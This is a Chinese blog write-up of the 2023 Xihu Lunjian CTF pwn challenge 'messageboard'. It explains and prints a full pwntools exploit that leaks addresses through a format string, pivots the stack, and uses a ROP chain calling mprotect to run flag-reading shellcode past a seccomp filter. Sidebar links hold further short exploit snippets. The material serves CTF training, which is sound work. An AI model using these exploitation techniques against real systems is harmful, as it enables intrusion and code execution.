2023西湖论剑--messageboard

最新推荐文章于 2023-03-05 15:54:59 发布
最新推荐文章于 2023-03-05 15:54:59 发布
阅读量294 收藏
点赞数
文章标签: 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61948538/article/details/129315602
版权

比赛的时候没有做出来,但是思路已经清楚了,主要是卡在了调试的某一步。

这是主函数,漏洞也出现在主函数中,可以很清楚的看到,第二次输入可以溢出到ret地址处,这样就相当于已经给了思路了,就是栈迁移。那么栈迁移肯定需要一个泄露地址和伪造栈的输入,所以leak是在第一个输入,用格式化字符串来泄露。而布栈就和栈迁移一起执行了。

第一步先泄露栈地址

泄露上述两个地址

p.sendlineafter("Welcome to DASCTF message board, please leave your name:","%p%31$p")
p.recvuntil("Hello, ")
stack_addr = int(p.recv(14),16) + 0x10 -0x8
print(hex(stack_addr))

libc_addr = int(p.recv(14),16) - 0x21c87
print(hex(libc_addr))
mprotect = 0x11b7e0 + libc_addr
pop_rdx_ret = 0x1b96 + libc_addr
system_addr = 0x4f420 + libc_addr
read_addr = 0x401120

这样就知道了栈地址和libc地址。

接下来就是如何得到flag了,因为execve被沙箱过滤了

所以想到有两种方法:1.用open函数直接打开flag 2.用mprotect函数改权限,执行shellcode打开flag。

我们复现的时候用第二种方法。

首先,执行mprotect函数,将某可读可写地址改为可执行的地址

payload = p64(pop_rdi_ret) + p64(0x404000) + p64(pop_rsi_r15_ret) 
payload += p64(0x1000) + p64(0) + p64(pop_rdx_ret) + p64(7) 
payload += p64(mprotect) + p64(pop_rdi_ret) + p64(0) 
payload += p64(pop_rsi_r15_ret) + p64(0x404000) + p64(0) 
payload += p64(pop_rdx_ret) + p64(0x100) + p64(read_addr) 
payload += p64(0x404000) + 'a'*40 + p64(stack_addr) + p64(leave_ret)

然后继续用read函数在该地址写入shellcode,布的栈是这样的。

最后就是读入shellcode执行就好了

以下是完整exp:

from LibcSearcher import *
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
elf=ELF('/home/hacker/Desktop/pwn' )
libc=ELF('/home/hacker/Desktop/libc-2.27.so' )
#p=remote("node4.buuoj.cn",27153)
p=process('/home/hacker/Desktop/pwn' )

pop_rdi_ret = 0x401413
leave_ret = 0x4013A2
puts_got = 0x404028
puts_plt = 0x4010E0
main_addr = 0x4012e3
pop_rsi_r15_ret = 0x0000000000401411

gdb.attach(p)
pause()

p.sendlineafter("Welcome to DASCTF message board, please leave your name:","%p%31$p")
p.recvuntil("Hello, ")
stack_addr = int(p.recv(14),16) + 0x10 -0x8
print(hex(stack_addr))

libc_addr = int(p.recv(14),16) - 0x21c87
print(hex(libc_addr))
mprotect = 0x11b7e0 + libc_addr
pop_rdx_ret = 0x1b96 + libc_addr
system_addr = 0x4f420 + libc_addr
read_addr = 0x401120
payload = p64(pop_rdi_ret) + p64(0x404000) + p64(pop_rsi_r15_ret) + p64(0x1000) + p64(0) + p64(pop_rdx_ret) + p64(7) + p64(mprotect) + p64(pop_rdi_ret) + p64(0) + p64(pop_rsi_r15_ret) + p64(0x404000) + p64(0) + p64(pop_rdx_ret) + p64(0x100) + p64(read_addr) + p64(0x404000) + 'a'*40 + p64(stack_addr) + p64(leave_ret)
gdb.attach(p)
pause()
p.sendafter("Now, please say something to DASCTF:",payload)
p.send(asm(shellcraft.cat("./flag")))

p.interactive()

_On3_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
西湖论剑——pwn
weixin_44319142的博客
04-07 540
pwn 这道题目开了canary,和之前的套路相似,就是要泄露canary,利用栈溢出找到system和/bin/sh,拿到访问权限 看一下函数 printf存在格式化字符串漏洞可以用于泄漏canary p.sendlineafter("ID:","%15$p") #不解释了这个要打印的是第十五个参数,也就是canary的值 p.recvuntil("Hello ")#输出hello之后...
2022西湖论剑-初赛CTF部分wp-Zodiac
toto的博客
02-03 3379
2023西湖论剑初赛CTF部分wp
2023西湖论剑RE--BabyRE
qq_61670993的博客
03-05 562
小菜鸡一枚
西湖论剑 2023 比赛复现
shinygod的博客
02-11 1393
在copy 路由会检验 ip 地址是否为 127.0.0.1,且请求体不能有__proto__。在 curl 路由中我们可以用http 请求走私来访问 copy 从而可以绕过 copy 路由里面的 ip 检测,然后利用constructor.prototype 替代__proto__,最后打ejs就行了。
2023西湖论剑wirteup
Amherstieae的博客
02-08 2148
前言:总之每天就是很困,每天都睡不醒,冬天困,夏天也困,没有不困的时候好想睡觉,开始写西湖论剑的复盘,希望以后多多复盘,多多写文章吧~~~(还是好困顺便,给大家推荐 田震版本的 若思念便思念,好听!!!!!!!!!!!!!!顺便,腊梅好像开了,好香。
2023西湖论剑-(部分)WP
xccwxy的博客
02-03 2330
2023西湖论剑-(部分)WP
messageboard-b-student
04-08
二维公告板 根据A部分中的说明,编写一个部门来管理二维部门委员会。 在步骤B中,您必须编写完整的练习。 练习应通过所有测试(分数的60%): make test ./test 此外,代码必须通过可读性测试(分数的20%): ...
messageboard-cpp
04-08
二维公告板根据A部分中的说明,编写一个部门来管理二维部门委员会。 在步骤B中,您必须编写完整的练习。 练习应通过所有测试(分数的60%): make test./test此外,代码必须通过可读性测试(分数的20%): make ...
messageboard-b
04-08
二维公告板根据A部分中的说明,编写一个部门来管理二维部门委员会。 在步骤B中,您必须编写完整的练习。 练习应通过所有测试(分数的60%): make test./test此外,代码必须通过可读性测试(分数的20%): make ...
2023西湖论剑复现
Luodehahajiang的博客
02-12 370
导出HTTP流,发现一个flag压缩包(有密码),找到解密算法。连接adb shell到目录data/system删除相应文件。结果分离出一个压缩包,mp3解出的就是压缩包密码。MP3stego分析一下,没有密码。分析觉得把黑白做01分离出来有东西。根据文件名47,rot47解密。重启后发现很多压缩包和两张图片。binwalk分离出一张图片。npbk文件,导入夜神模拟器。run一下或者F12。打开后发现有pin码。
西湖论剑2023 Dual personality writeup ——天堂之门技术的分析
qq_41866334的博客
02-04 1183
天堂之门技术分析
西湖论剑2022-misc-wp
网安小菜鸡
02-03 371
misc
2021 西湖论剑 pwn blind
yongbaoii的博客
03-26 603
利用ret2csu,覆盖alarm的got表最低一字节,通过爆破劫持alarm为syscall。 通过read函数的返回值让rax为0x5b,执行execve("/bin/sh", 0, 0) exp #/usr/env/bin python from pwn import * import time context.log_level = "debug" gadget1 = 0x4007ba gadget2 = 0x4007a0 elf = ELF('./blind') read_got = el.
西湖论剑 pwn题解析(持续更新中)
qq_41071646的博客
04-12 1002
这篇文章是我在我志琦哥 我们工作室 负责人 旁边 我俩上数据库课 我看着他一步一步 搞出来的 太强了 不过现在应该还在和我一样自闭中。。。 这个题 有 canary 保护 然后这个题 思路就是 找到 canary的偏移 然后泄露libc 库 然后 获取 system 地址 x64 要找 pop 这里 获取到 puts函数的地址 但是这个题 并没...
2022西湖论剑pwn部分wp
N1rvana的博客
02-05 855
西湖论剑2022pwn
2023西湖论剑pwn 部分wp
cainiao78777的博客
02-18 650
也就是*(&v3 + i) = v0 修改一个字节的内容,但是我们也要解一下这个方程,以免程序被exit()而且在buf的下面的变量都是能够覆盖的,也就是说,我们能通过覆盖 i 的值进行数组溢出。一个格式化字符串漏洞,一个栈溢出,但是只能副盖rbp和返回地址,所有要考虑栈迁移。我看有个大佬的解法很奇特,准备学习一下,待我学成,再来补充另外一种方法。泄露出这个函数地址,就能得到 libc——base。根据距离rbp的距离将相应的变量填入。这里的main指的是start,第二次getshell。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8381
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
“人力资源+大数据+薪酬报告+涨薪调薪”
最新发布
08-12
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
深度报告-20231012-东海证券-电力设备与新能源行业深度报告-长时储能东风起-钒电需求待腾飞-42页-3mb.pdf
08-12
深度报告-20231012-东海证券-电力设备与新能源行业深度报告_长时储能东风起_钒电需求待腾飞_42页_3mb.pdf
element-ui + vue 简易留言板
06-09
好的,我可以为您提供一个简单的留言板示例,使用Vue和Element UI实现。 首先,您需要安装Vue和Element UI: ``` npm install vue element-ui ``` 然后,创建一个Vue实例,引入Element UI和样式: ```html <template> <div> <el-input v-model="input" placeholder="请输入留言内容"></el-input> <el-button @click="addMessage">提交</el-button> <el-divider></el-divider> <el-card v-for="(message, index) in messages" :key="index"> <div slot="header" class="clearfix"> <span>留言 {{ index + 1 }}</span> <el-button style="float: right;" type="text" @click="deleteMessage(index)">删除</el-button> </div> <p>{{ message }}</p> </el-card> </div> </template> <script> import { ElInput, ElButton, ElDivider, ElCard } from 'element-ui' import 'element-ui/lib/theme-chalk/index.css' export default { name: 'MessageBoard', components: { ElInput, ElButton, ElDivider, ElCard }, data() { return { input: '', messages: [] } }, methods: { addMessage() { if (this.input) { this.messages.push(this.input) this.input = '' } }, deleteMessage(index) { this.messages.splice(index, 1) } } } </script> ``` 在这个示例中,我们使用了`ElInput`组件和`ElButton`组件来获取用户输入和提交留言,使用`ElDivider`组件来分割线,使用`ElCard`组件来显示留言内容。同时,我们使用了`v-for`指令来循环展示留言列表。 在`data`中,我们定义了`input`和`messages`变量,用于存储用户输入和留言列表。在`methods`中,我们定义了`addMessage`方法和`deleteMessage`方法,用于添加留言和删除留言。 最后,我们将组件导出,并在需要使用留言板的地方引入即可。 希望这个示例能够帮助到您!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值